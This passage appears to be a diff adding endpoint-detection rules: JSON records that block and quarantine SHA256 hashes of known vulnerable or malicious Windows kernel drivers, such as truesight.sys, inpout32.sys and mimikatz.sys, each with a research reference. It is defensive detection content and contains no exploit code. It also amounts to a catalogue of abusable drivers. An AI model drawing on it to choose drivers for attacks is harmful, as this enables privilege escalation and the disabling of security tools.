+ "id": "d36ad9dd-0ee6-50a9-8c51-53db71c353b3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.830651Z",
+ "creation_date": "2026-03-23T11:45:30.830653Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.830658Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6177613652eaf63a2cfc1bd377b5159980f2fb2ce12b88c2ad92a0e89157381",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d379808e-a35d-56ae-8b3e-750e784973ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495922Z",
+ "creation_date": "2026-03-23T11:45:31.495924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20f7eb43732e7813d3af0a34e543f0cd3ebfc20f2c0f33139e0b3fe03c49dc45",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d37ca3f7-2cc8-5fe4-9558-9c5f29072061",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984493Z",
+ "creation_date": "2026-03-23T11:45:29.984495Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984501Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb2e8e98a58329e86a1ee310fe9dfce7056f4a0ede380eee8768c51b5870c433",
+ "comment": "Vulnerable Kernel Driver (aka inpout32.sys) [https://www.loldrivers.io/drivers/97fa88f6-3819-4d56-a82c-52a492a9e2b5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3851bce-2f35-5e05-b403-daf2a9dec365",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.815579Z",
+ "creation_date": "2026-03-23T11:45:31.815581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.815586Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "91fab8e79aebe13dc687702d6a7ccbf9293050fafd9b7d443b5000c40d408cec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d38b5a39-e354-5a16-8366-0051b28079a2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811898Z",
+ "creation_date": "2026-03-23T11:45:31.811900Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811906Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e41e80a36e3e5f9c6444a626350712e2c12614f2256ada671e0218b24f46120d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3922563-da8b-58cc-af9d-155962770749",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479202Z",
+ "creation_date": "2026-03-23T11:45:30.479205Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "85686a6dec96776c2e8510fea7ca198b84429fb0b756a2d87ee1cc4570ac9b87",
+ "comment": "Vulnerable Kernel Driver (aka NCHGBIOS2x64.SYS) [https://www.loldrivers.io/drivers/d2806397-9ceb-47c8-b5f3-3aabec182ff5/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3969778-ce1d-52d9-91d2-6cd5f3719a96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829577Z",
+ "creation_date": "2026-03-23T11:45:30.829581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829589Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b27c91559b2f4f1736685edee9f9e250dcbd91b479aaae27bbb3ca5b37deb052",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3a41f63-f28f-53b4-b367-0dc912d403a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472554Z",
+ "creation_date": "2026-03-23T11:45:31.472557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472566Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14156ba6bb21cb431a2d70a16df7a54ad7d94febdc4066654b565552098f5f83",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3aa06f7-b993-5fb1-b89b-b7bb9c9453f8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816574Z",
+ "creation_date": "2026-03-23T11:45:30.816576Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816582Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bcaeac1a4a51b210bfc5ebdb6f797797299a171e0b6d50aa8f9bcdb45a51d629",
+ "comment": "Vulnerable Kernel Driver (aka ngiodriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3b353f4-4447-5219-999b-5c6e6d4eadbc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488483Z",
+ "creation_date": "2026-03-23T11:45:31.488485Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488490Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a3fb8d303387f8036e38525aa384030a6e3bc79697f8c5e48188347c7d2704b7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3d2d931-f613-549d-82aa-1372d91432a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824058Z",
+ "creation_date": "2026-03-23T11:45:31.824061Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824068Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6b0d607abf3d48c6ac77185644fe98a87dc795fe302686464cc700dcb8dfa19b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3e51087-bb5b-5b87-9d98-6723f79f3224",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.461837Z",
+ "creation_date": "2026-03-23T11:45:30.461841Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.461850Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47356707e610cfd0be97595fbe55246b96a69141e1da579e6f662ddda6dc5280",
+ "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3e55608-eccc-5b02-b8ec-eef60cddcf0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492485Z",
+ "creation_date": "2026-03-23T11:45:31.492487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "600a17409fa52c474a72ab3f5d85817ef052954f81055f558054ecf575808b4a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d3ebe340-1af9-5faa-ae16-85fc43f7668a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481079Z",
+ "creation_date": "2026-03-23T11:45:30.481081Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481087Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5c3ac6f22b3f1614ad0c01c180421f7588460accba5065562bf735d24bd3c674",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d4082f0d-8d50-5184-900d-0634dcbbf8a0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830499Z",
+ "creation_date": "2026-03-23T11:45:31.830501Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830506Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1aed62a63b4802e599bbd33162319129501d603cceeb5e1eb22fd4733b3018a3",
+ "comment": "Vulnerable Rentdrv2 Driver (aka rentdrv2_x32.sys and rentdrv_x64.sys) [https://github.com/keowu/BadRentdrv2, https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d40b5174-6f69-5a46-84cc-5e170c407b67",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820929Z",
+ "creation_date": "2026-03-23T11:45:30.820931Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820936Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39134750f909987f6ebb46cf37519bb80707be0ca2017f3735018bac795a3f8d",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d422193a-dbfc-5ece-9450-f79eaa4e60a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819088Z",
+ "creation_date": "2026-03-23T11:45:30.819090Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "533b8138ab8f776008ff8918c8cfa52604e43efca4e39da5096404c8424084b7",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d433523c-2392-5f7d-aa32-b6f6565a52c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976625Z",
+ "creation_date": "2026-03-23T11:45:29.976627Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976632Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13cd99ff2120d9fd651814d826b6c8481d549f684a8fbfb2d8775c9faa1c27f5",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d45ef7ea-b157-5a73-a60e-f9f747a74eda",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143165Z",
+ "creation_date": "2026-03-23T11:45:31.143167Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143173Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f2e0da56010ce28e88a10a08ee98b7015faad016243928b9b8426ef912eb057",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d4685b73-e054-51d9-adff-cf9145dcbc77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818084Z",
+ "creation_date": "2026-03-23T11:45:30.818086Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818091Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "76940e313c27c7ff692051fbf1fbdec19c8c31a6723a9de7e15c3c1bec8186f6",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d46e1471-4e84-5d89-9691-f9b84b80c2ee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620496Z",
+ "creation_date": "2026-03-23T11:45:29.620498Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620503Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d47e7efb-c7ef-55dc-96d5-3dd1da19526d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476661Z",
+ "creation_date": "2026-03-23T11:45:31.476665Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0369c017c4d9d03e1399c31ef0857c94f9b4a759151e1f7dcefb78b76bd86ad5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d489c95f-23c2-55a8-b43b-29575820c453",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
